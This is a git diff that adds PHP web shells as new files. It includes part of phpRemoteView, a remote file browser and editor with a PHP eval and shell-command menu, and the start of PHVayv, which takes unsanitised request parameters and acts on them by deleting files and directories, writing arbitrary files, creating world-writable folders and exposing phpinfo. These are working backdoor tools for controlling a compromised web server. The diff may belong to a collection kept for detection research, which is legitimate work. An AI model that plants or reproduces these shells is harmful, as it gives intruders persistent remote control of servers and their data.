+"file not found"=>"ôàéë íå íàéäåí",
+"ONLY READ ACCESS (don't edit!)"=>"ÄÎÑÒÓÏ ÒÎËÜÊÎ ÍÀ ×ÒÅÍÈÅ (íå ğåäàêòèğîâàòü)",
+"Can't READ file - access denied (don't edit!)"=>"Íå ìîãó ×ÈÒÀÒÜ ôàéë - äîñòóï çàïğåùåí",
+"EDIT FILE"=>"ÏĞÀÂÈÒÜ ÔÀÉË",
+"can't open, access denied"=>"íå ìîãó îòêğûòü, äîñòóï çàïğåùåí",
+"SAVE FILE (write to disk)"=>"ÑÎÕĞÀÍÈÒÜ ÔÀÉË (çàïèñü íà äèñê)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"Âû äîëæíû îòìåòèòü ãàëî÷êó [ñîçäàòü ôàéë àâòîìàòè÷åñêè] èëè ââåñòè â ïîëå èìÿ ôàéëà!'",
+"SAVING TO"=>"ÑÎÕĞÀÍÈÒÜ Â",
+"Sorry, access denied"=>"Èçâèíèòå, äîñòóï çàïğåùåí",
+"for example, uncomment next line"=>"äëÿ ïğèìåğà, ğàñêîììåíòèğóéòå ñëåäóşùóş ñòğîêó",
+"Eval PHP code"=>"Âûïîëíèòü PHP êîä",
+"don't type"=>"íå ïèøèòå",
+"and"=>"è",
+"example (remove comments '#')"=>"ïğèìåğ (óäàëèòå êîììåíòàğèè '#')",
+"Shell commands"=>"Êîìàíäû Shell'a",
+"filesize to 0byte"=>"ğàçìåğ â 0 áàéò",
+"from"=>"îò",
+"to"=>"â",
+"Full file name"=>"Ïîëíîå èìÿ ôàéëà",
+"Can't open directory"=>"Íå ìîãó îòêğûòü êàòàëîã",
+"setup"=>"íàñòğîéêà",
+"back"=>"íàçàä",
+"Reset all settings"=>"Ñáğîñèòü âñå íàñòğîéêè",
+"clear"=>"î÷èñòèòü",
+"Current"=>"Òåêóùèå",
+"Colums and sort"=>"Êîëîíêè è ñîğòèğîâêà",
+"Sort order"=>"Ïîğÿäîê ñîğòèğîâêè",
+"Ascending sort"=>"Ïî âîçğàñòàíèş",
+"Descending sort"=>"Ïî óáûâàíèş",
+"Sort by filename"=>"Ñîğòèğîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîğòèğîâàòü ïî ğàñøèğåíèş ôàéëà",
+"Date/time format"=>"Ôîğìàò äàòû/âğåìåíè",
+"Panel font & size"=>"Øğèôò/ğàçìåğ ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ğóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåğèòå øğèôò",
+"or type other"=>"èëè ââåäèòå äğóãîé",
+"Font size"=>"Ğàçìåğ øğèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåğèğîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåğñàëüíûå êîíâåğòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ğàçìåğ",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãğóïïà",
+'a'=>"Âëàäåëåö/Ãğóïïà",
+'c'=>"Ïğàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+
diff --git a/php/PHVayv.php b/php/PHVayv.php
new file mode 100644
index 0000000..87e88b3
--- /dev/null
+++ b/php/PHVayv.php
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
